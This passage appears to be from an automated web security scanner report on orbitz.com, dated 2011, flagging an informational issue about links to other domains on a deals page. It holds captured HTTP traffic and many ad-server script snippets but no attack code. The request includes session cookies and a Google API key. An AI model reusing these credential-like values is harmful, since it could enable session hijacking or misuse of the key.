src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=336x280&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=middle&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="adfeaturedest">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=featuredest&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=script&pos=middle&"></script>
...[SNIP]...
<div class="ad" id="ad250x250_left">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=left&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=left&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=left&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad250x250_right">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=right&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=right&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&adType=noframe&pos=right&" height="null" width="null" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1x1">
<iframe allowtransparency="true" height="1" width="1channel=deals" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/Section=main&adsize=1x1&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&height=1&width=1channel=deals&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&Section=main&adsize=1x1&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&height=1&width=1channel=deals&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&Section=main&adsize=1x1&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&height=1&width=1channel=deals&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&Section=main&adsize=1x1&dest=ADBLOCKER&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ADBLOCKER&tile=1296715537626&dsrc=7&height=1&width=1channel=deals&" height="1" width="1channel=deals" border="0"></a>
...[SNIP]...

17.345. http://www.orbitz.com/App/PerformMDLPDealsContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PerformMDLPDealsContent

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.google.com/jsapi
http://www.google.com/jsapi?key=ABQIAAAA6K7-G9TwmbSAW0WMeI7twRRuLtrLBmy3ZCyUfu5dRv1kHZq3GhQwwTCDcXv2m_f6QE7H9Tmg0QAwAA
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&
http://www.revresda.com/html.ng/Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=script&pos=middle&
http://www.revresda.com/image.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&
http://www.revresda.com/js.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&

Request

GET /App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=885D5B40605DF6B2568089DC16F1E311; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:06:30 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 186823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad" id="adsponsorlogo">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad hotelTelesalesAd">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad300x600_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=top&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=top&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=top&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad300x600_bottom">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=bottom&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=bottom&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=bottom&" height="null" width="null" border="0"></a>
...[SNIP]...
</style>

<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAA6K7-G9TwmbSAW0WMeI7twRRuLtrLBmy3ZCyUfu5dRv1kHZq3GhQwwTCDcXv2m_f6QE7H9Tmg0QAwAA"></script>
...[SNIP]...
<div class="ad" id="ad336x280">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=middle&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=middle&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=middle&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="adfeaturedest">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=script&pos=middle&"></script>
...[SNIP]...
<div class="ad" id="ad250x250_left">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=left&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=left&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=left&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad250x250_right">
